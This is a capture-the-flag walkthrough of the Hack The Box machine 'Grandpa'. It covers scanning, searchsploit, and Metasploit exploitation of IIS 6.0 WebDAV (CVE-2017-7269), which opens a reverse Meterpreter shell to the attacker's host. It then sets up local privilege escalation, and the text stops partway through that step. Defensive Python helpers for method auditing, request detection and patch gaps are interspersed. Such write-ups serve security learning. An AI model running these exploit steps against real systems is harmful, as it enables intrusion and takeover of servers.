Grandpa

From Luniwiki


Grandpa01.png

Port scanning

root@kali:~/HTB/Machines/Grandpa# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.14 --rate=1000
Starting masscan 1.0.5 at 2019-11-17 04:25:04 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.14

Only port 80 is open.

root@kali:~/HTB/Machines/Grandpa# nmap -A -T4 -v 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 23:27 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating Ping Scan at 23:27
Scanning 10.10.10.14 [4 ports]
Completed Ping Scan at 23:27, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:27
Scanning grandpa.htb (10.10.10.14) [1000 ports]
Discovered open port 80/tcp on 10.10.10.14
Completed SYN Stealth Scan at 23:27, 5.28s elapsed (1000 total ports)
Initiating Service scan at 23:27
Scanning 1 service on grandpa.htb (10.10.10.14)
Completed Service scan at 23:27, 6.10s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against grandpa.htb (10.10.10.14)
Retrying OS detection (try #2) against grandpa.htb (10.10.10.14)
Initiating Traceroute at 23:27
Completed Traceroute at 23:27, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 23:27
Completed Parallel DNS resolution of 2 hosts. at 23:27, 0.19s elapsed
NSE: Script scanning 10.10.10.14.
Initiating NSE at 23:27
Completed NSE at 23:27, 0.94s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.19s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.047s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Sun, 17 Nov 2019 04:27:50 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   46.64 ms 10.10.14.1
2   46.76 ms grandpa.htb (10.10.10.14)

NSE: Script Post-scanning.
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Initiating NSE at 23:27
Completed NSE at 23:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds
           Raw packets sent: 2084 (95.284KB) | Rcvd: 38 (2.416KB)
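The http-methods and http-webdav-scan results above are the finding that matters most on this host: an "Under Construction" IIS 6.0 site advertising the full WebDAV authoring method set. The following audit helper is an added example for this write-up, not code from the original page; it parses the Public and Allow headers of an OPTIONS response the way the nmap scripts do and separates server-wide exposure (Public) from what the requested URL actually accepts (Allow). The sample response is constructed from the headers nmap reported here (the DAV header value is assumed), and fetch_options is a plain standard-library helper for running the same check against your own servers.

```python
"""Audit helper: classify the HTTP methods a web server advertises.

Added example for this write-up, not part of the original page. It parses the
Public/Allow headers from an OPTIONS response (as nmap's http-methods and
http-webdav-scan scripts do) and flags the WebDAV and other methods that a
placeholder IIS site has no business exposing.
"""
import http.client

# WebDAV authoring methods let a client write, move or lock content and are
# the surface the IIS 6.0 WebDAV bugs live in; write methods and TRACE are
# flagged separately.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}
WRITE_METHODS = {"PUT", "DELETE", "POST"}
DIAGNOSTIC_METHODS = {"TRACE"}

# Constructed sample echoing the headers nmap reported for this host.
# Public is the server-wide list, Allow is the list for the requested URL.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "DAV: 1, 2\r\n"              # assumed value, typical for IIS 6.0 WebDAV
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw_response: str) -> dict:
    """Return a lowercase-keyed dict of headers from a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def methods_from(header_value: str) -> set:
    """Split a comma-separated method list into an upper-cased set."""
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def audit_options(raw_response: str) -> dict:
    """Summarise what the server exposes, server-wide and on this URL."""
    headers = parse_headers(raw_response)
    public = methods_from(headers.get("public", ""))
    allow = methods_from(headers.get("allow", ""))
    advertised = public | allow
    risky = WEBDAV_METHODS | WRITE_METHODS | DIAGNOSTIC_METHODS
    return {
        "server": headers.get("server", ""),
        "webdav_enabled": bool(advertised & WEBDAV_METHODS) or "dav" in headers,
        "risky": sorted(advertised & risky),
        "write_on_this_url": sorted(allow & WRITE_METHODS),
    }


def fetch_options(host: str, path: str = "/", port: int = 80,
                  timeout: float = 5.0) -> str:
    """Send one OPTIONS request and return status line plus headers as raw text."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        lines = [f"HTTP/1.1 {resp.status} {resp.reason}"]
        lines += [f"{name}: {value}" for name, value in resp.getheaders()]
        return "\r\n".join(lines) + "\r\n\r\n"
    finally:
        conn.close()


if __name__ == "__main__":
    # Offline run over the constructed sample; swap in fetch_options(host)
    # to audit a live server.
    for key, value in audit_options(SAMPLE_OPTIONS_RESPONSE).items():
        print(f"{key}: {value}")
```

On this host the audit reports WebDAV enabled with twelve risky methods advertised server-wide even though the root URL itself accepts no write method; the fix on IIS 6.0 is to prohibit WebDAV under Web Service Extensions unless authoring is genuinely required, and to restrict the remaining methods per site.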

Next we run the nmap vulnerability scripts against port 80 to look for anything known.

root@kali:~/HTB/Machines/Grandpa# nmap -p 80 --script vuln 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 23:29 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for grandpa.htb (10.10.10.14)
Host is up (0.046s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|_  /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Nmap done: 1 IP address (1 host up) scanned in 209.95 seconds

Web Server

Grandpa02.png

The web server seems to serve the default IIS "Under Construction" page.

root@kali:~/HTB/Machines/Grandpa# dirb  http://10.10.10.14

----------------- DIRB v2.22 By The Dark Raver -----------------
START_TIME: Sat Nov 16 23:48:24 2019
URL_BASE: http://10.10.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.14/ ----
+ http://10.10.10.14/_private (CODE:403|SIZE:1529)
==> DIRECTORY: http://10.10.10.14/_vti_bin/
+ http://10.10.10.14/_vti_bin/_vti_adm/admin.dll (CODE:200|SIZE:195)
+ http://10.10.10.14/_vti_bin/_vti_aut/author.dll (CODE:200|SIZE:195)
+ http://10.10.10.14/_vti_bin/shtml.dll (CODE:200|SIZE:96)
+ http://10.10.10.14/_vti_cnf (CODE:403|SIZE:1529)
+ http://10.10.10.14/_vti_log (CODE:403|SIZE:1529)
+ http://10.10.10.14/_vti_pvt (CODE:403|SIZE:1529)
+ http://10.10.10.14/_vti_txt (CODE:403|SIZE:1529)
+ http://10.10.10.14/aspnet_client (CODE:403|SIZE:218)
==> DIRECTORY: http://10.10.10.14/images/
==> DIRECTORY: http://10.10.10.14/Images/

---- Entering directory: http://10.10.10.14/_vti_bin/ ----
==> DIRECTORY: http://10.10.10.14/_vti_bin/_vti_aut/
---- Entering directory: http://10.10.10.14/images/ ----
---- Entering directory: http://10.10.10.14/Images/ ----
---- Entering directory: http://10.10.10.14/_vti_bin/_vti_aut/ ----
-----------------
END_TIME: Sun Nov 17 00:06:46 2019
DOWNLOADED: 23060 - FOUND: 9

Dirb doesn't find anything interesting, except that the FrontPage Server Extensions are installed.

FrontPage extensions

root@kali:~/HTB/Machines/Grandpa# wget http://10.10.10.14/_vti_inf.html
root@kali:~/HTB/Machines/Grandpa# cat _vti_inf.html
...
--><!-- FrontPage Configuration Information
    FPVersion="5.0.2.6790"
    FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
    FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
    FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
    TPScriptUrl="_vti_bin/owssvr.dll"
-->
...

Searching for exploits

root@kali:~/HTB/Machines/Grandpa# searchsploit Frontpage
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure                   | exploits/windows/remote/19897.txt
FrontPage 97/98 - Server Image Mapper Buffer Overflow                                   | exploits/windows/dos/19853.txt
FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Exis | exploits/windows/remote/19877.txt
Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection                                      | exploits/php/webapps/7683.pl
Microsoft FrontPage - Server Extensions Cross-Site Scripting                            | exploits/cgi/webapps/27620.txt
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Ob | exploits/windows/remote/19845.pl
Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buff | exploits/windows/remote/19846.pl
Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service                     | exploits/windows/dos/19445.txt
Microsoft FrontPage Personal Web Server 1.0/4.0 - Directory Traversal                   | exploits/windows/remote/19753.txt
Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)                        | exploits/windows/remote/121.c
Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit)  | exploits/windows/remote/16356.rb
OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Si | exploits/php/webapps/15838.php
Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion                             | exploits/php/webapps/2471.pl
Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion                                  | exploits/php/webapps/3147.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

MS03-051 doesn't fit our version of the FrontPage extensions; we confirm it with the Metasploit check.

root@kali:~/HTB/Machines/Grandpa# msfconsole
msf5 > search MS03-051
Matching Modules
================

   #  Name                                            Disclosure Date  Rank  Check  Description
   -  ----                                            ---------------  ----  -----  -----------
   0  exploit/windows/isapi/ms03_051_fp30reg_chunked  2003-11-11       good  Yes    MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow

msf5 > use exploit/windows/isapi/ms03_051_fp30reg_chunked
msf5 exploit(windows/isapi/ms03_051_fp30reg_chunked) > set RHOST 10.10.10.14
RHOST => 10.10.10.14
msf5 exploit(windows/isapi/ms03_051_fp30reg_chunked) > check
[*] Requesting the vulnerable ISAPI path...
[*] 10.10.10.14:80 - The target is not exploitable.

FrontPage seems to be a dead end.

IIS 6.0

root@kali:~/HTB/Machines/Grandpa# searchsploit IIS 6.0
---------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                          |  Path
                                                                                        | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure        | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                 | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                   | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                            | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)  | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                             | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                             | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                           | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                         | exploits/windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                | exploits/windows/remote/19033.txt
---------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

CVE-2017-7269 (ScStoragePathFromUrl) is very interesting. The Python script 41738.py works, but only launches calc.exe on the server. There is, however, a Metasploit module for it.
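From the defender's side, the useful thing to know about CVE-2017-7269 is what the request looks like on the wire: the overflow in ScStoragePathFromUrl is reached through the WebDAV If: header of a PROPFIND request carrying overlong URL tokens, while a legitimate If: header holds one or two short <URL> (<lock-token>) entries. The detector below is an added example for this write-up, not code from the original page, from Metasploit or from the exploit author; it inspects raw HTTP requests (as an IDS or reverse proxy in front of IIS would see them) and flags PROPFIND requests whose If: header is abnormally long. The three sample requests are constructed (the oversized one is just a long path, not exploit bytes) and the length thresholds are assumptions to tune to your own traffic.

```python
"""Detection helper for anomalous WebDAV PROPFIND requests.

Added example for this write-up, not from the original page, from Metasploit
or from the exploit author. Flags requests whose WebDAV `If:` header is
unusually long or carries oversized URL tokens, the shape of a
CVE-2017-7269 attempt against IIS 6.0. Thresholds are assumptions.
"""
import re

MAX_IF_HEADER_LEN = 512   # assumption: a sane If: header is far shorter
MAX_URL_TOKEN_LEN = 255   # assumption: longest URL you expect inside <...>

URL_TOKEN_RE = re.compile(r"<([^>]*)>")

# Constructed samples with CRLF line endings as on the wire: a plain
# PROPFIND, a PROPFIND against a locked resource, and a PROPFIND whose If:
# header carries a very long URL token (just length, no exploit bytes).
NORMAL_PROPFIND = (
    "PROPFIND /Images/ HTTP/1.1\r\n"
    "Host: 10.10.10.14\r\n"
    "Depth: 1\r\n"
    "Content-Length: 0\r\n\r\n"
)
LOCKED_PROPFIND = (
    "PROPFIND /docs/report.doc HTTP/1.1\r\n"
    "Host: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/docs/report.doc> "
    "(<opaquelocktoken:constructed-0001>)\r\n"
    "Content-Length: 0\r\n\r\n"
)
SUSPICIOUS_PROPFIND = (
    "PROPFIND / HTTP/1.1\r\n"
    "Host: 10.10.10.14\r\n"
    "If: <http://10.10.10.14/" + "A" * 600 + "> "
    "(<opaquelocktoken:constructed-0002>)\r\n"
    "Content-Length: 0\r\n\r\n"
)


def parse_request(raw: str) -> tuple:
    """Return (method, path, headers) from a raw HTTP request, headers keyed lowercase."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw: str) -> dict:
    """Score one request; returns a verdict with human-readable reasons."""
    method, path, headers = parse_request(raw)
    reasons = []
    if_header = headers.get("if")
    if if_header is not None:
        if len(if_header) > MAX_IF_HEADER_LEN:
            reasons.append(f"If header length {len(if_header)} > {MAX_IF_HEADER_LEN}")
        longest = max((len(t) for t in URL_TOKEN_RE.findall(if_header)), default=0)
        if longest > MAX_URL_TOKEN_LEN:
            reasons.append(f"If URL token length {longest} > {MAX_URL_TOKEN_LEN}")
        if method.upper() == "PROPFIND" and reasons:
            reasons.append("PROPFIND with oversized If header (CVE-2017-7269 pattern)")
    return {"method": method, "path": path,
            "suspicious": bool(reasons), "reasons": reasons}


def scan(requests) -> list:
    """Run inspect_request over many raw requests and keep only the alerts."""
    return [r for r in (inspect_request(x) for x in requests) if r["suspicious"]]


if __name__ == "__main__":
    for alert in scan([NORMAL_PROPFIND, LOCKED_PROPFIND, SUSPICIOUS_PROPFIND]):
        print(alert)
```

Detection is the fallback, not the fix: IIS 6.0 only ever needs WebDAV if someone authors through it, so the durable mitigation is to prohibit the WebDAV extension, and on a Windows Server 2003 host, which is long out of support, to retire the machine.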

root@kali:~/HTB/Machines/Grandpa# msfconsole
msf5 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.14:80 - The target is vulnerable.
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.34:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.14:1043) at 2019-11-17 22:16:46 -0500

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > shell
Process 2104 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Documents and Settings>systeminfo
systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 3 Hours, 3 Minutes, 33 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 792 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,321 MB
Page File: In Use:         149 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
meterpreter > pwd
C:\Documents and Settings
meterpreter > cd Administrator
[-] stdapi_fs_chdir: Operation failed: Access is denied.
meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
    This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
    This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
    A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys can allow a local attacker to trigger a NULL pointer dereference by using a specially crafted IOCTL. This flaw can be abused to elevate privileges to SYSTEM.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
    This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
    This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
    This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
    Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
    This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
    This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
[*] Post module execution completed
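The suggester's list reads, from the other side of the table, as a patch-gap report: systeminfo shows a single hotfix on a Windows Server 2003 SP2 box, and each suggested module maps to a bulletin whose KB is absent. The check below is an added example for this write-up, not code from the original page or from Metasploit: it parses systeminfo output for the OS and the installed hotfix list and reports which of the bulletins named above are unaccounted for. The bulletin-to-KB table is filled in from the Microsoft security bulletins and should be verified against the bulletin pages before being relied on; the sample systeminfo text is constructed from the capture above. It also distinguishes gaps that cannot be patched at all, because Windows Server 2003 left extended support on 14 July 2015 and the MS16 bulletins never shipped a package for it.

```python
"""Patch-gap check from `systeminfo` output.

Added example for this write-up (not from the original page or from
Metasploit). Extracts the OS build and installed hotfixes from the text
`systeminfo` prints and reports which of the privilege-escalation bulletins
the suggester named are not covered by an installed KB.
"""
import re

# Bulletin -> KB article shipping the fix. Assumption: taken from the
# respective Microsoft bulletin pages; verify and extend for your estate.
BULLETIN_KB = {
    "MS10-015": "KB977165",   # KiTrap0D
    "MS13-053": "KB2850851",  # EPATHOBJ::pprFlattenRec
    "MS14-058": "KB3000061",  # win32k TrackPopupMenu
    "MS14-070": "KB2989935",  # tcpip.sys IOCTL
    "MS15-051": "KB3045171",  # win32k ClientCopyImage
    "MS16-016": "KB3136041",  # mrxdav.sys
    "MS16-032": "KB3139914",  # Secondary Logon handles
    "MS16-075": "KB3164038",  # DCOM/RPC NTLM reflection
}

# Windows Server 2003 left extended support on 2015-07-14; bulletins issued
# after that date have no 2003 package, so those gaps cannot be patched.
SERVER_2003_EOL = "2015-07-14"
NO_2003_PACKAGE = {"MS16-016", "MS16-032", "MS16-075"}

# Constructed sample modelled on the systeminfo output captured above.
SAMPLE_SYSTEMINFO = """\
Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

# "[01]: KB3000061" style lines under Hotfix(s); old fixes use a Q prefix.
HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*((?:KB|Q)\d+)", re.IGNORECASE | re.MULTILINE)
# "Field Name:   value" lines; the non-greedy group stops at the first colon.
FIELD_RE = re.compile(r"^([A-Za-z() /]+?):\s+(.+)$", re.MULTILINE)


def parse_systeminfo(text: str) -> dict:
    """Pull OS name/version and the set of installed hotfix ids from systeminfo text."""
    fields = {m.group(1).strip(): m.group(2).strip() for m in FIELD_RE.finditer(text)}
    return {
        "os_name": fields.get("OS Name", ""),
        "os_version": fields.get("OS Version", ""),
        "hotfixes": {h.upper() for h in HOTFIX_RE.findall(text)},
    }


def patch_gaps(text: str, bulletins=BULLETIN_KB) -> dict:
    """Report bulletins whose KB is missing, split by whether a patch exists for this OS."""
    info = parse_systeminfo(text)
    is_2003 = "Server 2003" in info["os_name"]
    missing, unpatchable = [], []
    for bulletin, kb in sorted(bulletins.items()):
        if kb.upper() in info["hotfixes"]:
            continue
        if is_2003 and bulletin in NO_2003_PACKAGE:
            unpatchable.append(bulletin)
        else:
            missing.append(bulletin)
    return {
        "os": f'{info["os_name"]} ({info["os_version"]})',
        "installed": sorted(info["hotfixes"]),
        "missing": missing,
        "unpatchable_on_this_os": unpatchable,
        "out_of_support": is_2003,
    }


if __name__ == "__main__":
    for key, value in patch_gaps(SAMPLE_SYSTEMINFO).items():
        print(f"{key}: {value}")
```

Run against the captured output, every bulletin comes back missing and three of them as unpatchable, which is the real lesson of this box: a Server 2003 host exposed on the network has no supported path to a patched state.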

MS14-058 seems to be the most suitable candidate.

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
